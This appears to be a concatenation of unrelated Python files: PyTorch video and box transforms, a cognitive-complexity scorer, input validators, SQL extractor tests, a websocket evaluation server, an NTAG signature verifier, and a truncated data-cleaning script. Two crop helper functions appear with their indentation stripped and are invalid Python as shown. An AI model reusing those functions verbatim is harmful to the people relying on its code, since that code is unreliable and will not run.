        frames: frames sampled from the video (tensor with ndim > 1).
        frame_ratios: temporal down-sampling ratio for each pathway.
        temporal_dim: which dimension is time.

    Returns:
        List of per-pathway tensors.
    """
    total = frames.shape[temporal_dim]
    return [
        uniform_temporal_subsample(frames, total // ratio, temporal_dim)
        for ratio in frame_ratios
    ]
def convert_to_one_hot(
    targets: torch.Tensor,
    num_class: int,
    label_smooth: float = 0.0,
) -> torch.Tensor:
    """Expand class indices into (optionally label-smoothed) one-hot rows.

    Args:
        targets: tensor of class indices to convert.
        num_class: total number of classes.
        label_smooth: smoothing mass spread across non-target classes;
            0 (the default) disables smoothing.
    """
    assert (
        torch.max(targets).item() < num_class
    ), "Class Index must be less than number of classes"
    assert 0 <= label_smooth < 1.0, "Label smooth value needs to be between 0 and 1."
    off_value = label_smooth / num_class
    on_value = 1.0 - label_smooth + off_value
    # Without smoothing the result can stay integral (long); with smoothing,
    # fall back to the default floating dtype.
    out = torch.full(
        (targets.shape[0], num_class),
        off_value,
        dtype=torch.long if label_smooth == 0.0 else None,
        device=targets.device,
    )
    out.scatter_(1, targets.long().view(-1, 1), on_value)
    return out
def short_side_scale_with_boxes(
    images: torch.Tensor,
    boxes: torch.Tensor,
    size: int,
    interpolation: str = "bilinear",
    backend: str = "pytorch",
) -> Tuple[torch.Tensor, np.ndarray]:
    """Scale the short side of ``images`` to ``size`` and rescale ``boxes``
    by the same factor. Note that ``boxes`` is scaled in place.

    Args:
        images: (C, T, H, W) video tensor.
        boxes: (num_boxes, 4) boxes in pixel coordinates.
        size / interpolation / backend: see ``short_side_scale``.

    Returns:
        (scaled images, scaled boxes).
    """
    _, _, orig_h, orig_w = images.shape
    images = short_side_scale(images, size, interpolation, backend)
    new_h, new_w = images.shape[-2], images.shape[-1]
    # Uniform scaling, so one factor (derived from either axis) fits both.
    factor = float(new_h) / orig_h if orig_w < orig_h else float(new_w) / orig_w
    boxes *= factor
    return images, boxes
def random_short_side_scale_with_boxes(
    images: torch.Tensor,
    boxes: torch.Tensor,
    min_size: int,
    max_size: int,
    interpolation: str = "bilinear",
    backend: str = "pytorch",
) -> Tuple[torch.Tensor, torch.Tensor]:
    """Spatial scale jitter: pick a short-side size uniformly from
    [min_size, max_size] and scale ``images`` and ``boxes`` to it.

    Args:
        images: (C, T, H, W) video tensor.
        boxes: (num_boxes, 4) boxes.
        min_size / max_size: bounds for the sampled short-side size.
        interpolation / backend: see ``short_side_scale_with_boxes``.

    Returns:
        (scaled images, scaled boxes).
    """
    # torch RNG so the draw respects torch.manual_seed.
    target = torch.randint(min_size, max_size + 1, (1,)).item()
    return short_side_scale_with_boxes(
        images, boxes, target, interpolation, backend
    )
def random_crop_with_boxes(
    images: torch.Tensor, size: int, boxes: torch.Tensor
) -> Tuple[torch.Tensor, torch.Tensor]:
    """Randomly crop a ``size`` x ``size`` window from ``images`` and shift
    and clip ``boxes`` accordingly.

    Args:
        images: (C, T, H, W) video tensor.
        size: side length of the square crop.
        boxes: (num_boxes, 4) boxes.

    Returns:
        (cropped images, cropped-and-clipped boxes).
    """
    if images.shape[2] == size and images.shape[3] == size:
        # FIX: this early exit used to return the bare tensor, breaking
        # callers that unpack (images, boxes). Return a consistent tuple,
        # with the boxes clipped to the (unchanged) image extent as in the
        # general path below.
        return images, clip_boxes_to_image(boxes, images.shape[2], images.shape[3])
    height = images.shape[2]
    width = images.shape[3]
    y_offset = 0
    if height > size:
        y_offset = int(np.random.randint(0, height - size))
    x_offset = 0
    if width > size:
        x_offset = int(np.random.randint(0, width - size))
    cropped = images[:, :, y_offset : y_offset + size, x_offset : x_offset + size]
    cropped_boxes = crop_boxes(boxes, x_offset, y_offset)
    return cropped, clip_boxes_to_image(
        cropped_boxes, cropped.shape[-2], cropped.shape[-1]
    )
def _uniform_crop_helper(images: torch.Tensor, size: int, spatial_idx: int):
"""
A helper function grouping the common components in uniform crop
"""
assert spatial_idx in [0, 1, 2]
height = images.shape[2]
width = images.shape[3]
y_offset = int(math.ceil((height - size) / 2))
x_offset = int(math.ceil((width - size) / 2))
if height > width:
if spatial_idx == 0:
y_offset = 0
elif spatial_idx == 2:
y_offset = height - size
else:
if spatial_idx == 0:
x_offset = 0
elif spatial_idx == 2:
x_offset = width - size
cropped = images[:, :, y_offset : y_offset + size, x_offset : x_offset + size]
return cropped, x_offset, y_offset
def uniform_crop(
    images: torch.Tensor,
    size: int,
    spatial_idx: int,
) -> torch.Tensor:
    """Deterministically crop a ``size`` x ``size`` window from ``images``.

    Args:
        images: (C, T, H, W) tensor.
        size: crop side length.
        spatial_idx: 0/1/2 = left/center/right crop when width is larger
            than height, or top/center/bottom crop otherwise.

    Returns:
        The cropped (C, T, size, size) tensor.
    """
    return _uniform_crop_helper(images, size, spatial_idx)[0]
def uniform_crop_with_boxes(
    images: torch.Tensor,
    size: int,
    spatial_idx: int,
    boxes: torch.Tensor,
) -> Tuple[torch.Tensor, np.ndarray]:
    """Deterministic spatial crop of ``images`` with matching box adjustment.

    Args:
        images: (C, T, H, W) tensor.
        size: crop side length.
        spatial_idx: 0/1/2 = left/center/right crop when width is larger
            than height, or top/center/bottom crop otherwise.
        boxes: (num_boxes, 4) boxes.

    Returns:
        (cropped images, cropped-and-clipped boxes).
    """
    window, dx, dy = _uniform_crop_helper(images, size, spatial_idx)
    shifted = crop_boxes(boxes, dx, dy)
    clipped = clip_boxes_to_image(shifted, window.shape[-2], window.shape[-1])
    return window, clipped
def horizontal_flip_with_boxes(
    prob: float, images: torch.Tensor, boxes: torch.Tensor
) -> Tuple[torch.Tensor, torch.Tensor]:
    """With probability ``prob``, mirror ``images`` horizontally and mirror
    ``boxes`` to match; otherwise return them unchanged (boxes copied).

    Args:
        prob: flip probability in [0, 1].
        images: (C, T, H, W) tensor.
        boxes: (num_boxes, 4) boxes.

    Returns:
        (possibly flipped images, matching boxes).
    """
    mirrored_boxes = copy.deepcopy(boxes)
    if np.random.uniform() >= prob:
        return images, mirrored_boxes
    flipped = images.flip((-1))
    w = images.shape[3]
    # x-coordinates reflect around the image width (pixel-index convention).
    mirrored_boxes[:, [0, 2]] = w - boxes[:, [2, 0]] - 1
    return flipped, mirrored_boxes
def clip_boxes_to_image(boxes: torch.Tensor, height: int, width: int) -> torch.Tensor:
    """Return a copy of ``boxes`` clamped inside a ``height`` x ``width``
    image (pixel-index convention: max coordinates are width-1 / height-1).

    Args:
        boxes: (num_boxes, 4) boxes as [x1, y1, x2, y2].
        height: image height.
        width: image width.

    Returns:
        The clipped copy; the input tensor is left untouched.
    """
    bounded = copy.deepcopy(boxes)
    # x-coordinates live in columns 0 and 2, y-coordinates in 1 and 3.
    bounded[:, [0, 2]] = np.minimum(width - 1.0, np.maximum(0.0, boxes[:, [0, 2]]))
    bounded[:, [1, 3]] = np.minimum(height - 1.0, np.maximum(0.0, boxes[:, [1, 3]]))
    return bounded
def crop_boxes(boxes: torch.Tensor, x_offset: int, y_offset: int) -> torch.Tensor:
    """Translate ``boxes`` into the coordinate frame of a crop whose
    top-left corner sits at (x_offset, y_offset).

    Args:
        boxes: (num_boxes, 4) boxes as [x1, y1, x2, y2].
        x_offset: crop offset along x.
        y_offset: crop offset along y.

    Returns:
        The translated copy; the input tensor is left untouched.
    """
    shifted = copy.deepcopy(boxes)
    shifted[:, [0, 2]] = boxes[:, [0, 2]] - x_offset
    shifted[:, [1, 3]] = boxes[:, [1, 3]] - y_offset
    return shifted
def _get_param_spatial_crop(
scale: Tuple[float, float],
ratio: Tuple[float, float],
height: int,
width: int,
log_uniform_ratio: bool = True,
num_tries: int = 10,
) -> Tuple[int, int, int, int]:
"""
Given scale, ratio, height and width, return sampled coordinates of the videos.
Args:
scale (Tuple[float, float]): Scale range of Inception-style area based
random resizing.
ratio (Tuple[float, float]): Aspect ratio range of Inception-style
area based random resizing.
height (int): Height of the original image.
width (int): Width of the original image.
log_uniform_ratio (bool): Whether to use a log-uniform distribution to
sample the aspect ratio. Default is True.
num_tries (int): The number of times to attempt a randomly resized crop.
Falls back to a central crop after all attempts are exhausted.
Default is 10.
Returns:
Tuple containing i, j, h, w. (i, j) are the coordinates of the top left
corner of the crop. (h, w) are the height and width of the crop.
"""
assert num_tries >= 1, "num_tries must be at least 1"
if scale[0] > scale[1]:
scale = (scale[1], scale[0])
if ratio[0] > ratio[1]:
ratio = (ratio[1], ratio[0])
for _ in range(num_tries):
area = height * width
target_area = area * (scale[0] + torch.rand(1).item() * (scale[1] - scale[0]))
if log_uniform_ratio:
log_ratio = (math.log(ratio[0]), math.log(ratio[1]))
aspect_ratio = math.exp(
log_ratio[0] + torch.rand(1).item() * (log_ratio[1] - log_ratio[0])
)
else:
aspect_ratio = ratio[0] + torch.rand(1).item() * (ratio[1] - ratio[0])
w = int(round(math.sqrt(target_area * aspect_ratio)))
h = int(round(math.sqrt(target_area / aspect_ratio)))
if 0 < w <= width and 0 < h <= height:
i = torch.randint(0, height - h + 1, (1,)).item()
j = torch.randint(0, width - w + 1, (1,)).item()
return i, j, h, w
# Fallback to central crop.
in_ratio = float(width) / float(height)
if in_ratio < min(ratio):
w = width
h = int(round(w / min(ratio)))
elif in_ratio > max(ratio):
h = height
w = int(round(h * max(ratio)))
else: # whole image
w = width
h = height
i = (height - h) // 2
j = (width - w) // 2
return i, j, h, w
def random_resized_crop(
    frames: torch.Tensor,
    target_height: int,
    target_width: int,
    scale: Tuple[float, float],
    aspect_ratio: Tuple[float, float],
    shift: bool = False,
    log_uniform_ratio: bool = True,
    interpolation: str = "bilinear",
    num_tries: int = 10,
) -> torch.Tensor:
    """
    Crop the given images to random size and aspect ratio. A crop of random
    size relative to the original size and a random aspect ratio is made. This
    crop is finally resized to given size. This is popularly used to train the
    Inception networks.
    Args:
        frames (torch.Tensor): Video tensor to be resized with shape (C, T, H, W).
        target_height (int): Desired height after cropping.
        target_width (int): Desired width after cropping.
        scale (Tuple[float, float]): Scale range of Inception-style area based
            random resizing. Should be between 0.0 and 1.0.
        aspect_ratio (Tuple[float, float]): Aspect ratio range of Inception-style
            area based random resizing. Should be between 0.0 and +infinity.
        shift (bool): Bool that determines whether or not to sample two different
            boxes (for cropping) for the first and last frame. If True, it then
            linearly interpolates the two boxes for other frames. If False, the
            same box is cropped for every frame. Default is False.
        log_uniform_ratio (bool): Whether to use a log-uniform distribution to
            sample the aspect ratio. Default is True.
        interpolation (str): Algorithm used for upsampling. Currently supports
            'nearest', 'bilinear', 'bicubic', 'area'. Default is 'bilinear'.
        num_tries (int): The number of times to attempt a randomly resized crop.
            Falls back to a central crop after all attempts are exhausted.
            Default is 10.
    Returns:
        cropped (tensor): A cropped video tensor of shape (C, T, target_height, target_width).
    """
    assert (
        scale[0] > 0 and scale[1] > 0
    ), "min and max of scale range must be greater than 0"
    assert (
        aspect_ratio[0] > 0 and aspect_ratio[1] > 0
    ), "min and max of aspect_ratio range must be greater than 0"

    channels = frames.shape[0]
    t = frames.shape[1]
    height = frames.shape[2]
    width = frames.shape[3]

    i, j, h, w = _get_param_spatial_crop(
        scale, aspect_ratio, height, width, log_uniform_ratio, num_tries
    )

    if not shift:
        cropped = frames[:, :, i : i + h, j : j + w]
        # interpolate() on a 4-D tensor resizes the last two dims only, so
        # (C, T, h, w) is treated as (batch=C, channels=T, H, W) and the crop
        # is rescaled spatially for every frame at once.
        return torch.nn.functional.interpolate(
            cropped,
            size=(target_height, target_width),
            mode=interpolation,
        )

    # shift=True: sample a second box and linearly interpolate the two boxes
    # over time, so the crop window slides from box 1 (first frame) to box 2
    # (last frame).
    i_, j_, h_, w_ = _get_param_spatial_crop(
        scale, aspect_ratio, height, width, log_uniform_ratio, num_tries
    )
    i_s = [int(x) for x in torch.linspace(i, i_, steps=t).tolist()]
    j_s = [int(x) for x in torch.linspace(j, j_, steps=t).tolist()]
    h_s = [int(x) for x in torch.linspace(h, h_, steps=t).tolist()]
    w_s = [int(x) for x in torch.linspace(w, w_, steps=t).tolist()]
    # Bug fix: allocate the output with the input's dtype and device.
    # Previously this was always a float32 CPU tensor, which raised/copied
    # incorrectly for half-precision or CUDA inputs.
    cropped = torch.zeros(
        (channels, t, target_height, target_width),
        dtype=frames.dtype,
        device=frames.device,
    )
    for ind in range(t):
        cropped[:, ind : ind + 1, :, :] = torch.nn.functional.interpolate(
            frames[
                :,
                ind : ind + 1,
                i_s[ind] : i_s[ind] + h_s[ind],
                j_s[ind] : j_s[ind] + w_s[ind],
            ],
            size=(target_height, target_width),
            mode=interpolation,
        )
    return cropped
| StarcoderdataPython |
1722607 | <filename>decomplexator/cc.py
"""
@author: <NAME>
Cleaned a bit by <NAME>
"""
import redbaron
redbaron.ipython_behavior = False
class CognitiveComplexity(object):
    """Compute a cognitive-complexity score for every function/method in a
    Python source file, using a RedBaron syntax tree.

    Scoring loosely follows the SonarSource "Cognitive Complexity" model:
    +1 for each break in linear flow (branch, loop, except, boolean sequence)
    plus +1 for every level of nesting around such a break.
    """

    def evaluate(self, filename):
        """
        Calculate cognitive complexity for all functions and methods defined in file.

        :param filename: path to the Python source file to analyse
        :return: dict mapping a dotted qualified name (e.g. ``Class.method`` or
            ``outer.inner`` for nested defs) to its complexity score
        """
        fns = dict()
        with open(filename) as file:
            red = redbaron.RedBaron(file.read())
        for fn in red.find_all("def"):
            # Build the qualified name by walking up the enclosing def/class
            # chain from the function to the module root.
            names = []
            p = fn
            while p:
                names = [p.name] + names
                p = p.parent_find(['def', 'class'])
            name = '.'.join(names)
            # Total score = boolean-sequence + branch + nesting contributions.
            cc = self.__sequences(fn) + self.__conditions(fn) + self.__structures(fn)
            fns[name] = cc
        return fns

    def __sequences(self, func):
        """Score boolean-operator sequences: a run of identical operators
        (``a and b and c``) costs 1; changing operator or starting a new
        expression starts a new sequence. A ``not`` inside an operand adds 1.
        """
        cc = 0
        last = None
        for node in func.find_all("BooleanOperatorNode"):
            # NOTE(review): parent_find() is given a *node* here rather than a
            # type name; this relies on RedBaron returning None for a
            # non-ancestor -- confirm against the RedBaron API docs.
            if last is None or node.value != last.value or node.parent_find(last) is None:
                cc += 1
            if 'not' in [node.value for node in node.find_all("UnitaryOperatorNode")]:
                cc += 1
            last = node
        return cc

    def __conditions(self, func):
        # Each elif/else branch costs +1; the initial `if` itself is charged
        # in __structures.
        return len(func.find_all("ElifNode")) + len(func.find_all("ElseNode"))

    def __structures(self, func):
        """Score structural increments plus a nesting penalty.

        Every node type in ``increments`` costs +1 on its own, and one more
        for each enclosing level listed in ``levels`` between it and ``func``.
        """
        # Constructs that break linear flow and therefore increment the score.
        increments = {
            "IfNode",
            "TernaryOperatorNode",
            "ComprehensionIfNode",
            "ForNode",
            "ComprehensionLoopNode",
            "WhileNode",
            "ExceptNode"
        }
        # Constructs that additionally count as a nesting level.
        levels = increments.union({
            "ElseNode",
            "ElifNode",
            "DefNode",
            "LambdaNode"
        })
        nodes = list()
        for node in increments:
            nodes.extend(func.find_all(node))
        cc = 0
        for node in nodes:
            # Walk from the node up to (but excluding) func's parent, adding
            # +1 per enclosing level. A def that merely wraps a returned def
            # (a decorator) is not charged as a nesting level.
            node = node.parent
            while node != func.parent:
                name = node.__class__.__name__
                if name in levels and (name != 'DefNode' or not self.__is_decorator(node)):
                    cc += 1
                node = node.parent
        return cc

    def __is_decorator(self, func):
        # Heuristic: a def whose body (ignoring comments/blank lines) is
        # exactly [DefNode, ReturnNode] looks like a decorator definition.
        values = [
            node.__class__.__name__
            for node in func.value
            if node.__class__.__name__ not in ['CommentNode', 'EndlNode']
        ]
        return len(values) == 2 and values[0] == 'DefNode' and values[1] == 'ReturnNode'
| StarcoderdataPython |
3237772 | <filename>utils/train_helper.py
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from graphs.models.deeplab_multi import DeeplabMulti
from modeling.deeplab import *
def get_model(args):
    """Build the segmentation model selected by ``args.backbone``.

    :param args: namespace with at least ``backbone`` and ``num_classes``
        (and ``imagenet_pretrained`` for deeplabv2_multi); it is passed to the
        model's ``optim_parameters`` and mutated (``numpy_transform`` is set).
    :return: tuple ``(model, params)`` of the model and its optimizer
        parameter groups.
    :raises ValueError: if ``args.backbone`` is not a supported choice.
        Previously an unknown backbone fell through both branches and crashed
        with ``NameError`` at the return statement.
    """
    if args.backbone == "deeplabv2_multi":
        model = DeeplabMulti(num_classes=args.num_classes,
                             pretrained=args.imagenet_pretrained)
        params = model.optim_parameters(args)
        args.numpy_transform = True
    elif args.backbone == "deeplabv3_plus":
        model = DeepLab(num_classes=args.num_classes,
                        backbone='resnet',
                        output_stride=16,
                        sync_bn=False,
                        freeze_bn=False)
        params = model.optim_parameters(args)
        args.numpy_transform = True
    else:
        raise ValueError("Unsupported backbone: {!r}".format(args.backbone))
    return model, params
| StarcoderdataPython |
1657903 | <filename>PCprophet/validate_input.py
import PCprophet.exceptions as PCpexc
import pandas as pd
class InputTester(object):
    """Validate a tab-separated input file before the pipeline uses it.

    The checks run depend on ``filetype``:
      * ``ids`` -- sample-id table: required columns present, non-empty, unique ids
      * ``db``  -- complex database: CORUM-style columns, falling back to the
        pairwise ``protA``/``protB`` format when those are missing
      * ``in``  -- main input matrix: ``GN``/``ID`` present, unique GN, no NaN
    """

    def __init__(self, path, filetype, infile=None):
        super(InputTester, self).__init__()
        self.infile = infile
        self.filetype = filetype
        self.path = path

    def read_infile(self):
        """Load ``self.path`` as a tab-separated DataFrame into ``self.infile``."""
        self.infile = pd.read_csv(self.path, sep="\t", index_col=False)

    def test_missing_col(self, col):
        """Raise ``MissingColumnError`` unless every name in ``col`` is a column."""
        absent = [name for name in col if name not in self.infile.columns]
        if absent:
            raise PCpexc.MissingColumnError(self.path)

    def test_empty(self, col):
        """Raise ``EmptyColumnError`` if any listed column contains a null."""
        for name in col:
            if self.infile[name].isnull().values.any():
                raise PCpexc.EmptyColumnError(self.path)

    def test_uniqueid(self, totest):
        """Raise ``DuplicateIdentifierError`` when rows repeat on ``totest``."""
        dup_mask = self.infile.duplicated(totest)
        if dup_mask.any():
            print("The following rows in {} are duplicated".format(self.path))
            print(self.infile[dup_mask])
            raise PCpexc.DuplicateIdentifierError(self.path)

    def test_all(self, *args):
        """Run the column-presence and uniqueness checks together.

        ``args[0]`` is the list of required columns, ``args[1]`` the list of
        columns that must jointly identify a row uniquely.
        """
        required_cols, unique_cols = args[0], args[1]
        self.test_missing_col(required_cols)
        self.test_uniqueid(unique_cols)

    def test_na(self):
        """Raise ``NaInMatrixError`` if any cell anywhere in the file is null."""
        if self.infile.isnull().values.any():
            raise PCpexc.NaInMatrixError(self.path)

    def test_file(self):
        """Read the file and dispatch the checks appropriate for its type."""
        self.read_infile()
        if self.filetype == "ids":
            required = ["Sample", "cond", "group", "short_id", "repl", "fr"]
            self.test_all(required, ["repl", "short_id"])
            self.test_empty(required)
        elif self.filetype == "db":
            try:
                required = ["ComplexID", "ComplexName", "subunits(Gene name)"]
                self.test_all(required, ["ComplexName", "ComplexID"])
                self.test_empty(required)
            except PCpexc.MissingColumnError:
                # Fall back to the pairwise-interaction database format.
                self.test_missing_col(["protA", "protB"])
        elif self.filetype == "in":
            self.test_all(["GN", "ID"], ["GN"])
            self.test_na()
| StarcoderdataPython |
3317724 | from unittest import TestCase
from sqltest.parser import SparkSqlExtractor
from sqltest.parser.catalog import Field
class TestSqlExtractor(TestCase):
    """Tests for SparkSqlExtractor.extract_table on CREATE TABLE DDL,
    covering both tidy and deliberately messy comma/quote formatting.
    """

    def test_should_extract_table_succeed_with_normalize_sql(self):
        # Well-formatted DDL: trailing commas, a back-quoted partition column,
        # and double-quoted TBLPROPERTIES values. The stray space after
        # "student_id INT " is deliberate formatting noise.
        extractor = SparkSqlExtractor()
        create_table_ddl = """
        CREATE TABLE IF NOT EXISTS db_name.tb_name
        (
            subject STRING,
            student_id INT ,
            student_gender STRING,
            student_age INT,
            score INT
        )
        USING PARQUET
        PARTITIONED BY (subject, `student_age`)
        TBLPROPERTIES ("foo"="bar", "val"="value")
        LOCATION 'target_data_path/db_name/tb_name'
        ;
        """
        table = extractor.extract_table(create_table_ddl)
        self.assertEqual(table.name, "tb_name")
        self.assertEqual(table.db, "db_name")
        self.assertEqual(
            list(table.fields),
            [
                Field("subject", "STRING"),
                Field("student_id", "INT"),
                Field("student_gender", "STRING"),
                Field("student_age", "INT"),
                Field("score", "INT"),
            ],
        )
        # Back-quotes around `student_age` must be stripped in the result.
        self.assertEqual(list(table.partitions), ["subject", "student_age"])

    def test_should_extract_table_succeed_with_non_normalize_sql(self):
        # Messy DDL: leading commas with inconsistent spacing and
        # single-quoted TBLPROPERTIES values.
        extractor = SparkSqlExtractor()
        create_table_ddl = """
        CREATE TABLE IF NOT EXISTS db_name.tb_name
        (
            subject STRING
            , student_id INT
            ,student_gender STRING
            , student_age INT
            ,score INT
        )
        USING PARQUET
        PARTITIONED BY (subject)
        TBLPROPERTIES ('foo'='bar', 'val'='value')
        LOCATION 'target_data_path/db_name/tb_name'
        ;
        """
        table = extractor.extract_table(create_table_ddl)
        self.assertEqual(table.name, "tb_name")
        self.assertEqual(table.db, "db_name")
        self.assertEqual(
            list(table.fields),
            [
                Field("subject", "STRING"),
                Field("student_id", "INT"),
                Field("student_gender", "STRING"),
                Field("student_age", "INT"),
                Field("score", "INT"),
            ],
        )
        self.assertEqual(list(table.partitions), ["subject"])
| StarcoderdataPython |
42898 | <filename>src/mipi-code2vec/mipi_websocket/mipi_server.py
#!/usr/bin/env python
import asyncio
import json
import websockets
from mipi.base_codemeaning_predictor import PatchInfo
from mipi.mipi_app import Mipi
class MipiWSServer:
    """Websocket front-end for a Mipi code-evaluation object.

    Serves two endpoints: the main evaluation socket on ``port`` and an
    admin socket on ``port_admin`` whose only job is to stop the event loop.
    """

    def __init__(self, mipi_obj, address="localhost", port=8765, port_admin=8766):
        # mipi_obj must expose evaluate(PatchInfo) returning an object with
        # to_json() -- see the Mipi usage in evaluate_patch below.
        self.port = port
        self.port_admin = port_admin
        self.address = address
        self.mipi = mipi_obj

    async def shutdown(self):
        # Stops the running asyncio loop; invoked from the admin endpoint.
        print('stopping ws server')
        asyncio.get_event_loop().stop()
        print('ws server stopped')

    async def evaluate_patch(self, websocket, patch_info):
        """Evaluate one patch dict and send the JSON result back on the socket.

        :param websocket: connection the result is written to
        :param patch_info: already-parsed JSON dict describing the patch
        """
        print('Begin evaluate patch')
        patch = PatchInfo()
        patch.from_json(patch_info)
        result = self.mipi.evaluate(patch)
        print('End evaluate patch, results: \n%s' % result)
        message = result.to_json()
        print('Begin send message: %s' % message)
        await websocket.send(message)

    async def hello(self, websocket, path):
        """Main connection handler.

        Each incoming message is parsed as JSON and evaluated; input that
        fails to parse is echoed back with a 'NOT JSON' prefix.
        """
        # await register(websocket)
        print("hello begin, path: %s, ws: %s" % (path, websocket))
        # data = await websocket.recv()
        async for message in websocket:
            print("message: %s" % message)
            try:
                patch_info = json.loads(message)
                await self.evaluate_patch(websocket, patch_info)
            except ValueError as e:
                # json.loads raises JSONDecodeError (a ValueError subclass) on
                # bad input; note a ValueError escaping evaluate_patch would
                # also land here and be mislabelled as "NOT JSON".
                response_msg = "NOT JSON: %s" % message
                print("response message: %s" % response_msg)
                # await asyncio.wait(websocket.send(response_msg))
                await websocket.send(response_msg)
        print("hello end, path: %s, ws: %s" % (path, websocket))

    async def shutdown_ws_server(self, websocket, path):
        """Admin handler: any connection to the admin port stops the server."""
        print("shutdown begin: ws: %s, path: %s" % (websocket, path))
        await self.shutdown()

    def start(self):
        """Bind both websocket servers, then run the event loop until stopped.

        Both serve() coroutines must complete (sockets bound) before
        run_forever(); the loop only exits via shutdown() stopping it.
        """
        start_server = websockets.serve(self.hello, self.address, self.port)
        print("Starting")
        asyncio.get_event_loop().run_until_complete(start_server)
        print(f'Listening for requests at [ws://{self.address}:{self.port}]')
        shutdown_server = websockets.serve(self.shutdown_ws_server, self.address, self.port_admin)
        # print('start admin')
        asyncio.get_event_loop().run_until_complete(shutdown_server)
        asyncio.get_event_loop().run_forever()
        # print("stopped")
# print("stopped")
# Manual entry point: build the Mipi application and serve it over websockets
# on the default address/ports until the admin endpoint stops the loop.
if __name__ == '__main__':
    mipi = Mipi()
    server = MipiWSServer(mipi)
    server.start()
| StarcoderdataPython |
3310485 | # Verify asymmetric originality signature
# Based on public AN12196 8.2 Asymmetric check
import sys
import binascii
from ecdsa import VerifyingKey
from ecdsa.curves import NIST224p
from ecdsa.keys import BadSignatureError
# Originality-check public key from NXP AN12196, hex-decoded to bytes.
# Used with curve NIST224p in validate_tag(); the leading 0x04 suggests an
# uncompressed EC point (0x04 || X || Y) -- confirm against the ecdsa docs.
PUBLIC_KEY = binascii.unhexlify(b"048A9B380AF2EE1B98DC417FECC263F8449C7625CECE82D9B916C992DA209D68422B81EC20B65A66B5102A61596AF3379200599316A00A1410")
def validate_tag(uid: bytes, sig: bytes) -> bool:
    """Verify an NTAG originality signature against a tag UID.

    :param uid: raw tag UID bytes (treated as the signed digest)
    :param sig: raw ECDSA signature as returned by the tag's Read_Sig command
    :return: True when the signature matches NXP's public key, False otherwise
    """
    verifier = VerifyingKey.from_string(PUBLIC_KEY, curve=NIST224p)
    try:
        verifier.verify_digest(sig, uid)
    except BadSignatureError:
        return False
    else:
        return True
# CLI entry point: expects exactly two hex-encoded arguments (UID, signature).
# Exit codes: 0 = valid signature, 1 = invalid signature, 2 = usage error.
if __name__ == "__main__":
    if len(sys.argv) != 3:
        print('Usage: python3 validate_ecc.py <uid> <sig>')
        print(' uid - tag UID, hex encoded')
        print(' sig - originality signature as returned by Read_Sig')
        print('Example:')
        print(' python3 validate_ecc.py 04518DFAA96180 D1940D17CFEDA4BFF80359AB975F9F6514313E8F90C1D3CAAF5941AD744A1CDF9A83F883CAFE0FE95D1939B1B7E47113993324473B785D21')
        sys.exit(2)
    # unhexlify raises binascii.Error on malformed hex input (uncaught here).
    uid = binascii.unhexlify(sys.argv[1])
    sig = binascii.unhexlify(sys.argv[2])
    if validate_tag(uid, sig):
        print('OK')
        sys.exit(0)
    else:
        print('INVALID')
        sys.exit(1)
| StarcoderdataPython |
1676297 | # -*- coding: utf-8 -*-
"""
Created on Wed May 17 16:36:14 2017
@author: vrtjso
"""
import numpy as np
import pandas as pd
from datetime import datetime, date
from operator import le, eq
from Utils import sample_vals, FeatureCombination
import gc
from sklearn import model_selection, preprocessing
from sklearn.decomposition import PCA
from sklearn.linear_model import LinearRegression
####Data Cleaning####
# Kaggle Sberbank-style pipeline: load train/test, apply manual address fixes,
# join region divisions, clean outliers, engineer features, write the two
# *_featured.csv files consumed by the model-training step.
print('Data Cleaning...')
#Data importing
trainDf = pd.read_csv('train.csv').set_index('id')
testDf = pd.read_csv('test.csv').set_index('id')
fix = pd.read_excel('BAD_ADDRESS_FIX.xlsx').set_index('id')
testDf['isTrain'] = 0
trainDf['isTrain'] = 1
allDf = pd.concat([trainDf,testDf])
# filter_func returning all-True makes update() overwrite every cell covered
# by the fix sheet, not just NaNs (the default only fills NaN).
allDf.update(fix, filter_func = lambda x:np.array([True]*x.shape[0])) #update fix data
macro = pd.read_csv('macro.csv')
#Join division and macro
divisions = pd.read_csv('divisions.csv')
allDf = allDf.join(divisions.set_index('sub_area'), on='sub_area')
# macro = pd.read_csv('macro.csv')
# allDf = allDf.join(macro[['timestamp','macro_combined_index']].set_index('timestamp'), on='timestamp')
# macro = macro.loc[365:2343,:] #drop data before 2011 and after 2016.6
# macro_full = macro.loc[:,macro.count()==1979] # drop nan columns
# macro_missing = macro.loc[:2190,macro.count()==1826]
# allDf = allDf.join(macro_full.set_index('timestamp'), on='timestamp')
# FeatureCombination(macro_full.drop('timestamp',1),'',10)
# Drop variable with no use (actuallly they are useful :)
# allDf = allDf.drop(['16_29_male','cafe_count_5000_price_1500','market_count_1000',
# '0_6_male','young_male','build_count_before_1920','market_count_1500',
# 'trc_count_500','church_count_3000','cafe_count_2000_na_price',
# 'mosque_count_3000','leisure_count_2000','build_count_slag',
# "oil_chemistry_raion","railroad_terminal_raion","mosque_count_500",
# "nuclear_reactor_raion", "build_count_foam", "big_road1_1line",
# "trc_sqm_500", "cafe_count_500_price_high","mosque_count_1000", "mosque_count_1500"],1)
# Drop no use macro
# allDf = allDf.drop(["real_dispos_income_per_cap_growth","profitable_enterpr_share",
# "unprofitable_enterpr_share","share_own_revenues","overdue_wages_per_cap",
# "fin_res_per_cap","marriages_per_1000_cap","divorce_rate","construction_value",
# "invest_fixed_assets_phys","pop_migration","pop_total_inc","housing_fund_sqm",
# "lodging_sqm_per_cap","water_pipes_share","baths_share","sewerage_share","gas_share",
# "hot_water_share","electric_stove_share","heating_share","old_house_share",
# "infant_mortarity_per_1000_cap", "perinatal_mort_per_1000_cap", "incidence_population",
# "load_of_teachers_preschool_per_teacher","provision_doctors","power_clinics","hospital_beds_available_per_cap",
# "hospital_bed_occupancy_per_year","provision_retail_space_sqm","provision_retail_space_sqm",
# "theaters_viewers_per_1000_cap","museum_visitis_per_100_cap","population_reg_sports_share",
# "students_reg_sports_share","apartment_build",
# 'gdp_annual_growth','old_education_build_share','provision_nurse','employment', #features from this line on had zero importance
# 'apartment_fund_sqm','invest_fixed_capital_per_cap'],1)
### Change price by rate ###
allDf['timestamp'] = pd.to_datetime(allDf['timestamp'])
# price_q_rate = [0,1.1,1,2.36,7.6,2.79,2.79,2.77,-1.68,1.04,.44,.41,-.98,1.26,.86,1.69,1.12,-.68,-1.85,-1.66,-1.69,-.097]
# price_rate = [1]
# for i in range(1,len(price_q_rate)):
# price_rate.append(price_rate[i-1] * (1 + price_q_rate[i] * 0.01))
# year_quarter = np.array((allDf.timestamp.dt.year - 2011) * 4 + allDf.timestamp.dt.quarter - 1)
# p = np.ones(allDf.shape[0])
# for i in range(0,allDf.shape[0]):
